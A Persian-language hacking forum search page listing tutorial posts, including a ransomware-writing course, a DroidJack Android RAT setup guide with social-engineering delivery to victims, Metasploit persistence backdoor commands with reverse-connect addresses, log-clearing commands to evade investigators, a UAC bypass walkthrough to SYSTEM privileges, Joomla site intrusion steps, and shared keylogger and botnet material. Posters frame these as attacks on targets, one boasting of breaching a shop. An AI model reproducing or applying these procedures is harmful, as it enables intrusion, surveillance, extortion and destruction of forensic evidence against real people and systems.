رفتن به مطلب

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'آموزش هک'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

وبلاگ‌ها

چیزی برای نمایش وجود ندارد


جستجو در...

نمایش نتایجی که شامل...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد...

تاریخ عضویت

  • شروع

    پایان


گروه


About Me

17 نتیجه پیدا شد

  1. به نام خدا عرض سلام و خسته نباشید خدمت همگی دوستان و کاربران محترم. با عنایت خدا قراره که یه دوره باج افزار نویسی برای سیستم عامل ویندوز رو با زبان شیرین پایتون شروع کنیم. عزیزانی که می خوان تو این دوره با من همراه باشند باید به زبان پایتون تسلط کافی داشته باشند. دوره به دو بخش تقسیم میشه. 1- طراحی اسکلت باج افزار میایم یه باج افزار می نویسیم که فقط یه لیستی از پسوند ها رو انکریپت کنه، و کلید رو برای ما بفرسته، به همراه یه فایل دیکرپتور ساده. 2- ارتقا باج افزار نوشته شده کم کم این باج افزار خام رو ارتقا میدیم و اون رو تقویت می کنیم. پیشنیاز ها: 1- تسلط کامل بر روی زبان برنامه نویسی پایتون 2- آشنایی جزئی با ویندوز (اختیاری) 3- یک ویندوز مجازی موارد نصبی 1- پایتون3 2- ادیتور (بنده از VScode استفاده میکنم) اگر با ریجستری ویندوز آشنایی داشته باشید، کار تون در قسمت دوم دوره خیلی راحت میشه. در قسمت اول، از کتابخونه Cryptography استفاده میشه، اما اگر خدا بخواد تو قسمت دوم رمزنگاری پیچیده تر RSA رو پیاده سازی می کنیم. قوانین تاپیک 1- هیچ احدی، از ادمین گرفته تا کاربر تازه وارد، بدون هماهنگی در تاپیک پست نگذارید. 2- سوالات در این تاپیک پرسیده نمی شوند. برای پرسش سوال کلیک کنید. 3- در صورت داشتن سوال شخصی، انتقاد یا کمک در این زمینه کلیک کنید و پیام شخصی ارسال کنید. این جلسه: معرفی دوره + یک نمونه عملی: Guardiran.mp4 رفع مسئولیت تمام مسئولیت های استفاده از باج افزار بر عهده خود فرد میباشد و اینجانب هیچ گونه مسئولیتی در قبال استفاده نادرست از این بدافزار را ندارم و هرگونه پاسخگویی به ادعاهای مطرح شده توسط اشخاص حقیقی و حقوقی رد میشود و تیم امنیتی گاردایران هیچگونه مسئولیتی نسبت به آن ندارد. فهرست مطالب: قسمت اول - ویدیو معرفی قسمت اول - جلسه اول قسمت اول - جلسه دوم قسمت اول - جلسه سوم قسمت اول - جلسه چهارم ـــــــــــــــــــــــــــــــــــــــــ قسمت دوم - جلسه اول قسمت دوم - جلسه دوم قسمت دوم - جلسه سوم (جدید) مدت زمان دوره تا الان: 06 : 48 : 2 موفق باشید🌹
  2. Sadra

    بررسی کپچا به همراه توضیحات

    با سلام خدمت دوستان عزیز در این ویدئو که از مجموعه تست آسیب پذیری سایت ها بود ما کپچا دو سایت هاستینگ رو بررسی کردیم! سعی کردم تجربیاتم رو به خوبی انتقال بدم و به بهترین شکل ویدئو باشه. ( از بابت بالا بودن صدای اهنگ هم شرمنده ویدئوی بعدی حتما برطرف میشه) موفق و پیروز باشید.
  3. Sadra

    نظر سنجی کشف آسیب پذیری

    لطفا در نظر سنجی قرار دادن ویدئوی تست و نفوذ وبسایت ها و کشف باگ که بیشتر سایت ها هست شرکت کنید.
  4. Sadra

    راه های کسب درامد از هک و امنیت

    با سلام خدمت دوستان عزیز ویدئوی جدید در رابطه با راه های کسب درآمد از هک و امنیت که خیلی ها علاقه دارن لینک سایت های استفاده شده : hackerone.com bugdasht.ir kolahsefid.org faradars.org faranesh.com toplearn.com maktabkhooneh.org exploit-db.com
  5. 1TED

    تاپیک جامع ابزار بات نت (Botnet)

    به نام برنامه نویس هستی ♥! سلام دوستان با تاپیک جامع بات نت ها در خدمتتون هستم ../ در این تاپیک قرار هست انواع بات نت هارو با مشخصات براتون قرار بدم ../ برای دریافت اطلاعات درباره بات نت ها میتونید از این لینک استفاده کنید ../ لطفا به هیچ وجه اسپم ندید ../ ! در صورتی که براتون سوالی پیپش بیاد یا به بنده و یا به کاربران @R3dC0d3r @REX پیام خصوصی ارسال کنید../ با سپاس فراوان یا حـ ـق../ 2018/11/13
  6. Worst_board

    هک سایت

    بسم الله الرحمن الرحيم ?جوملا? دوستان من توی این تاپیک میخوام در باره ی مبحث سایت و پیدا کردن حفره هاو باگ هایش و سپس اقدام به نفوذ صحبت کنم پس لطفا توجه کنید. جوملا امنیت نسبتا خوبی داره ، یعنی نمیشه گفت چون ما میتونیم بهش نفوذ کنیم ضعیف است و باگ های مسخره ای داره . خیلی از سایت های معتبر جهان مثل فروشگاه های اینترنتی از سایت جوملا ست من خودم چند وقت پیش ی سایت فروشگاه فرانسوی رو تونستم بهش نفوذ کنم دوستان من فقط بگم که ی موضوعی هست که باید همتون بدونید. اونم اینکه باید توی این جور آموزش ها جنبه داشته باشید یعنی اول برید کامل یاد بگیرید (ی دو سه ماهی مثلا فقط وقت بذارید واسه همین آموز ش )و بیگدار به آب نزنید دیگه نصیحتی نیست و خودتون باید مواظب باشید خوب برای پیدا کردن حفره های سایت های جوملا راه های متعددی هست. ولی بهترین برنامه و بهترین راه استفاده از اسکنر های موفق و قوی در این زمینه است اونم برنامه ای نیست جز برنامه ی JOOMSCAN این برنامه توی سیستم عامل های کالی لینوکس (اوبونتو) نصب هست ولی توی بکترک باید نصب کرد. خوب حالا توی کالی سرچ کنید joomscan سپس وقتی وارد محیط این ابزار شدید باید طبق دستور های زیر پیش بروید دستور : joomscan -u target.com تارگت نام سایت است حالا باید منتظر باشید اسکن شروع بشه . ببینید ی نکته ای که با ید بدونید اینکه مهم نیست چن تا حفره یا باگ به شما نشون میده بلکه نهم اینکه چنتا از اسکن ها با پاسخ yes است سپس باید یکی یکی تست کنید . یعنی اکسپلویت هایی که میده به شما را به آخر آدرس سایت جوملا توی مرورگر اضافه کنید . توی یکی از اونها پسورد هش وجود داره که باید با ابزار هایی که بعدا میگم نوع هش را پیدا کنید و سپس رمز گشایی کنید به همین راحتی در ضمن کسی هست بدون که چی دورکی در گوگل باید سرچ کرد که فقط سایت های جوملا رو بیراه؟ ??? تشکر فراموش نشه Worst_board ?
  7. proxy

    اصطلاحات هک

    معنی هک: هک به معنی سود بردن از یک روش سریع و هوشمندانه برای حل یک مشکل در رایانه می‌باشد. در علوم مربوط به رایانه معنی هک گاه مساوی معنی کرک (crack) که رمزگشایی است نیز عنوان می‌شود. در گفتگوهای امروزی هک به معنی نفوذ به یک سیستم رایانه‌ای است؛ و کرک نیز به معنی رمزگشایی است و کراکر (به انگلیسی: Cracker) به فرد گشاینده رمز می‌گویند. باگ چیست؟ باگ نوعی خطا یا اشتباه در اجرای نرم افزار است که موجب نتایج اشتباه یا اجرا نشدن نرم افزار می‌شود. علت این اشکالات می‌تواند اشتباه در هنگام برنامه نویسی باشد. شرکت های سازنده نرم فزارها برای حل این مشکل قبل از ارائه نسخه نهایی نسخه‌هایی تحت نام بتا یا آلفا انتشار می‌دهند تا افرادی آنها را بررسی کنند و این باگ‌ها را گزارش کنند. و هکر میتواند با استفاده از باگ به نرمافزار نفوذ کرده و به هدف خود برسد. شل چیست؟ شل یک ابزار برنامه نویسی شده است که هکر با آپلود کردن اون روی سایت می تواند کارهای مورد نظر خودش رو مانند حذف یا دانلود فایلها و خواندن اطلاعات دیتابیس یا ... رو انجام دهد سی ام اس چیست؟ سی ام اس یا cms سیستم مدیریت محتوا مانند جوملا و وردپرس و..... پورت چیست؟ به راه های ورودی و خروجی اطاعات در سیستم پورت گفته میشه که مانند درهای یک خونه هستند اکسپلویت چیست؟ زمانی که هکر یک باگ رو کشف میکنه برای اینکه بتواند دفعه بعد با سرعت بیشتری نفوذ رو انجام بدهد یک کد مینویسد که عمل نفوذ رو انجام دهد که به آن اکسپلویت گفته می شود. آی پی چیست؟ به آدرس یک سیستم در بستر اینترنت یا شبکه آی پی ip گفته میشود دفیس و مس دفیس چیست؟ زمانی که صفحه سایت مورد نفوذ تغیر پیدا کرد در اصطلاح میگویند که سایت دفیس شده است حال اگر صفحه چند سایت با آی پی های یکسان تغییر پیدا کند میگویند که مس دفیس اتفاق افتاده است بایپس چیست؟ به عبور کردن از موانع بایپس میگویند مانند وقتی به سایتی نفوذ می کنید که safe mode آن فعال هست برای اجرا کردن دستورات خود بر روی شل به مشکل بر می خورید و دلیل آن هم وجود firewall سرور هست . برای اینکه بتوانید دستورات خود را بر روی شل اجرا کنید ولی firewall گیر ندهد باید آن را bypass (دور زدن firewall ) کنید . اگه چیزی رو از قلم انداختم بگید فقط دوستان لطف کنید به چت روم تبدیل نکنید اینجا رو ممنون
  8. irblack

    آموزش کار باdroidjack (حل شدن مشکل)

    با سلام خدمت همه اعضای گاردایران امروز میخوایم به آموزش کار با droidjack بپردازیم شاید خیلیاتون بلد باشین و کار کرده باشین اما یکم قلق داره اول این که به نظر من اگر با vps>انجام بدیم کار خیلی بهتر پیش میره و راحت تریم چونمشکل dnsو کمشدن امنیت و سرعت پایین اینترنت و درد سر شدن و..... رو نداریم و مهمتر اینکه خیلی وقتا همه چی هم درسته اما عمل نمیکنه پیگیر شدم دلیلش بن شدن اون از طرف شرکت های خدمات اینترنتی و دیتاسنتر ها بود..> بنظر من بهترین راه اینه که یه vps هلند بگیری خیلی روان و خوب کار میکنه و مشکل هم نداره چون دیتا سنتر های هلندی به اصتلاحوارز هستند و حساسیتی ندارند حالا میخوایم کارو شروع کنیم اول از همه باید فایروالو خاموش کنیم برای این کار در run..میزنیم "firewall.cpl" و بعد رو سربرگه بغلی که فک کنم اسمش این باشه "turn on windowsfirewall or on میریم و از اونجا دوتا قسمت رو خاموش می کنیم حالا بااید پورت باز کنیم برای این کار باید هم پورت tcp باز کنیم همudp برای این کار سرچ میکنیم firewall اولین گزینه میاد windows firewall روس کلیک می کنیم و به قسمت advance options میریم حالا از سربرگه inbound ruele میریم به منوی پورت ها حالا میزنیم رو سربرگه new rule میزنیم یه صفحه باز میشه بعد اونجا تیک رو روی port میزنیم در قسمت بعد شماره پورت رو انتخاب میکنیم tcp رو هم می زنیم بعدش بقیه اسم و توضیحات و... کامل می کنید بعد دوباره همون پورت با همون شماره فقط udp رو باز می کنید و تمام. حالا میرسه وقت به برنامه برنامه رو باز می کنیم تو قسمت genetate یه برنامه میسازیم یادتون باشه ای پی که ای پیه vps رو میدیم پورت هم که شماره پورت اسم و اینارو هم تنظیم می کنیم , l. و برنامه رو می سازیم حالا اونو با ترفند های مهندسی اجتمایی خودمون میدیم دست تارگت و اونطرف تو قسمت devices تارگتو پیدا میکنم و هر اطلاعاتی که بخوایم به راحتی شنو میکنیم #irblack در صورت مواجهه با مشکل>>>>>>>>>> telegram.me/irblack
  9. سلام در این اموزش قصد داریم یک فایل بک دور که کریپت شده هست (مخفی ) رو به شما یاد بدیم . در پشتی یک روش cryptosystem یا algorithm در سیستم های کامپیوتری بشمار میاد که مکانیزم های امنیتی و احراز هویت نفوذ گر را غیرفعال میکنه. اجرای خودکار در هر boot سیستم که به دلیل کریپت بودن اون انتی ویروس ها و فایروال ها قادر به شناخت ان نیستند و بک دور به شکل یک برنامه اصلی سیستم در سیستم قربانی قرار میگیره ، یکی از ویژگی های بارز این ماژول قدرتمند هست. در این بخش ما با ماژول built in ( معنی »» ماژول های داخلی که قبلا ساخته شده ) به نام persistence در پوسته meterpreter ابزار متااسپلویت و نیز ماژول metsvc اشنا میشیم و در بخش بعدی خدا بخواد با ابزار veil یک فایل از سیستم قربانی رو الوده میکنیم همچنین اسکریپت backdoor در این ابزار . خب وقتی شما از سیستم قربانی دسترسی گرفتید (لازم نیست حتما دسترسی سیستمی باشه) میخواید بک دوری ایجاد کنید که اگر فایل تروجان شما به هر دلیلی پاک شد (شخص قربانی یا انتی ویروس یا ..) یا از کار افتاد یک فایل جایگزین داشته باشید که قابلیت های بیشتری داره مثل اجرای خودکار. بیاد داشته باشین با اجرای این ماژول پروسه حمله شما روی اون انتقال پیدا میکنه ( کار اصلی بک دور همینه) در پوسته meterpreter دستور زیر رو بنویسید تا توضیحات این ماژول برای شما نشون داده بشه : run persistence -h خب در اینجا من پارامتر ها و ارگومان های مهمی که شما برای این ابزار نیاز دارید مینویسم و در اخر مثال میزنم براتون: A- : اتصال خودکار در سیستم هدف . S- : اجازه ی اجرای خودکار به بک دور . U- : احرای خودکار بک دور بعد از هر boot سیستم (بک دور برای اینکار مدام تلاش میکند ) i- : مدت زمان تاخیری که در پشتی تلاش میکند دوباره به نفوذگر متصل شود (به ثانیه) P- : تعیین کننده نوع پیلود در هنگام متصل شدن به هدف . p- : تعیین شماره پورت که ابزار متااسپلویت به دنیال ان به گوش بایستد. r- : تعیین ای پی ادرس نفوذگر برای BackConnect .( جلوی این پارامتر از ای پی پابلیک خود یعنی ای پی که ISP به شما داده هم میتونید استفاده کنید اکر در سطح wan یعنی جهانی حمله رو پیاده سازی کردید نه محلی ، اگر حمله محلی باشه همون ای پی لوکال که داخل دستور ifconfig یا ipconfig هست رو استفاده کنید ) مفهوم back connect همین هست که شما یه اتصال دوباره به هدف داشته باشید ( دقیقا کاری که بک دور انجام میده) مثال ها : run persistence -U -A -X -p 443 -r 42.36.47.2 run persistence -A -L c:\\ -X 30 -p 443 -r 42.36.47.2 run persistence -U -A -i 10 - 8090 -r 42.36.47.2 ** دستورات در پوسته meterpreter نوشته میشن** ماژول دومم که ساده تره و میتونید help اونرو با دستور زیر ببینید: run metsvc -h بخش بعدی ساخت در پشتی با veil موفق باشید
  10. سلام این اموزش زمانی کارسازه که شما قبلا uac رو بایپس کردید (در ویندوز های جدید) و سطح دسترسی سیستمی دارید برای ویرایش . خب در مورد ابزار veil که یکی از پروژه های قدرتمند در زمینه دور زدن انتی ویروس ها بشمار میاد ویا دیگر ابزار های دور زدن انتی ویروس ها صحبتی نمیکنم چرا که استاد بنده alizombie کامل و شفاف گفتن که در کتاب اموزش کالی لینوکس اموزش میدن و مطمئنم حتما اموزش جامع و روان هست پس برای این مورد میتونید به کتاب مراجعه کنید . اما در اینجا ما قصد داریم رد پاهایی که در log های سیستم قربانی داریم رو حذف کنیم تا از سوی متخصصین امنیت هم در امان بمانیم و لو نریم !! خوشبختانه این مرحله از حمله هم توسط ابزار متااسپلویت صورت میگیرد و در پوسته meterpreter پیاده سازی میشود . سه نمونهداز ماژول های built in رو مورد بررسی قرار میدیم که کارشون پاکسازی رد پاهاست و استفاده از هر کدام دلخواه است : ابتدا در پوسته meterpreter دستور زیر را بنویسید : irb حال مهمترین log هایی که باید از سیستم هدف پاک شوند را در داخل محیط irb مینویسیم و در اخر با متد clear تمام log ها پاک میشوند : log = client.sys.eventlog.open('system') log = client.sys.eventlog.open('security') log = client.sys.eventlog.open('application') log = client.sys.eventlog.open('directory service') log = client.sys.eventlog.open('dns server') log = client.sys.eventlog.open('file replication service') log.clear exit خب این از روش اول برای پاکسازی ردپاها. روش دوم فقط با فراخوانی ماژول clearev شروع و تمام میشود : clearev روش سوم به همین طریق : event_manager -c اگر به سیستم های لینوکسی حمله کردید تکنیک های دستی Manuel دیگری نیز برای پاکسازی رد پا وجود دارند مانند حذف محتویات فایل /var/log/messages و bash_history و ... more ~/.bash_history; echo $HISTSIZE; export HISTSIZE=0 shred -zu root/.bash_history دقت کنید که همه دستورات پاکسازی رد پا در پوسته meterpreter وارد شود و برای مورد اخر دستورات در ترمینال وارد میشود .
  11. سلام برای بایپس UAC یکی از بهترین روش ها استفاده از ماژول های built in در متا اسپلویت هست. هنگامی که شما قصد دارید در ونیدوز 7 ,8, 10 ,.. سطح دسنرسی خود را به ' سیستم ' برسانید ممکن است با پیغام خطا موجه شوید . ماژولی که در باره ان صحبت میکنیم در دسته ماژول های محلی local قرار میگیرد یعنی پس از استفاده از یک ماژول remote و گرفتن دسترسی مناسب میتوان از این ماژول استفاده کرد: getuid use priv getsystem دستورات در پوسته meterpreter وارد میشوند. دستور getsystem که همان ماژولی هست که صحبت کردیم به طور حتم در ویندوز های xp و ویندوز سرور ها جوابگوست اما از ویندوز xp به بعد ویژگی جدیدی به نام UAC ظاهر شد که میتوانست از دستکاری های غیر مجاز جلوگیری کند . پس این ماژول در اینگونه ویندوز ها دارای خطاست مگر اینکه قبلا بایپس کرده باشید. ابتدا اطلاعات سطحی از سیستم قربانی میگیریم : run post/windows/gather/win_privs مشاهده میکنید که در قسمت is admin و یا is system کلمه false و در قسمت uac enabled کلمه true نوشته شده. ما از پوسته meterpreter برای مدتی خارج میشویم (منظور بستن نیست) و بعدماژول های بایپس uac را جستجو میکنیم که bypassuac_injection و bypassuac هستند .طریقه کار هر کدام بسته به ویندوز دارد ( 7 یا 8 یا 10) اگر با یکی جواب نگرفتید مطمئنا دومی جوابگوست . ضمنا با خارج شدن از پوسته شماره نشست session را بیاد داشته باشید: background search uac use exploit/windows/local/bypassuac show options در اینجا متغیر هایی که باید مقدار داده شوند نشان داده خواهد شد . set payload windows/meterpreter/reverse_TCP set LHOST IP set LPORT port set SESSION number set TARGET 0 or 1 خب شماره نشست رو که در قسمت مربوطه وارد کنید شماره target هم برای معماری سیستم طرف هست که اونم داخل show options نوشته شده. در نهایت دستور exploit پیلود بایپس در سیستم اپلود و اجرا میشود و از طریق همان پیلود سطح دسترسی سیستمی اکسپلویت (بهره برداری) میشود. و حالا ماژول getsystem برای انجام این عمل : getsystem برای اطمینان ماژول win_priv را دوباره اجرا کنید: run post/windows/gather/win_priv مقدار is admin و is system برابر true و مقدار uac enabled برابر false قرار داده شده. میتوانید ماژول getuid را فرا بخوانید و ببینید که PE به شما داده شده! getuid خروجی : NT AUTHORITY/SYSTEM حال شما ادمین کلاینت هستید . راه دیگر هم هست به اسم steal token که زیاد مناسب ورژن های جدید ویندوز نیست بیشتر در xp استفاده میشه اونم برا نشان جعلیو افزایش سطح دسترسی که راحتتره و اگر getsystem به دلایل نادری جواب نداد از این روش در xp و ویندوز سرور استفاده میشه.
  12. درود ../ با آموزش هک سایت با باگ Xpatch injection در خدمتتون هتسیم رمز فایل فشرده : guardiran.org فایل Help +Exploit پیوست شد یا حـ ـق ../ xpatch injection.rar exploit+help.rar
  13. با سلام خدمت کاربران گارد ایران. این روش هک نیست البته از نظره بنده فقط جنبه آموزش داره. امید وارم خوشتون بیاد آموزش.zip
  14. GAZALE201

    نفوذ با بولوتوث

    ازمنوی اصلی گوشی نمادبرنامه contacts را پیدا کنید و انتخاب کنید و فعال کنید . به ترتیب options—new contact را انتخاب کنید متن پیام مورد نظر را در فیلد اول first name تایپ کنید سایر فیلد ها را خالی بزارید گزینهdone را انتخاب کنید . حالا متن پیام حمله کننده به عنوان یکی از مدخلها در دفتر چه تلفن شماثبت می شه نام مدخل را انتخاب کنید و به ترتیب options—sent—via bluetooth را انتخاب کنید گزینه more devices را انتخاب کنید و گزینه selectرا انتخاب کنید پیامی که نوشته اید به عنوان یک پیام بلوتوث ناشناس به سوی قربانی ارسال می شه و قربانی جز اینکه پیام را قبول کنه و هک شود راهی دیگر نداره. و نکته اخر:هیچ وقت بلوتوث خود را در مکان های عمومی روشن نگذارید
  15. با سلام و درود یک مقاله با عنوان : هک رو از کجا شروع کنم؟ تو این مقاله یادمیگیرید که هک چیه ؟ و هک رو از کجا شروع کنید و .... مقاله رو ببینید ! امیدوارم خوشتون بیاد موفق و پیروز باشید start-hacking.pdf
  16. Mehran_FLash

    آموزش زبان برنامه نویسی به زبان ++C

    با سلام و عرض ادب آموزش زبان برنامه نویسی به زبان ++c باتشکر از دوست و استاد عزیزم *diamond*که منو راهنمایی کردن رمز فایل ها : guardiran.org موفق و پیروز باشید C++.part1.rar C++.part2.rar
  17. Mehran_FLash

    MasterKey Keylogger

    کیلاگر قدرتمند MasterKey Keylogger به همراه عکس ..... موفق باشید masterkey.rar
×
×
  • ایجاد مورد جدید...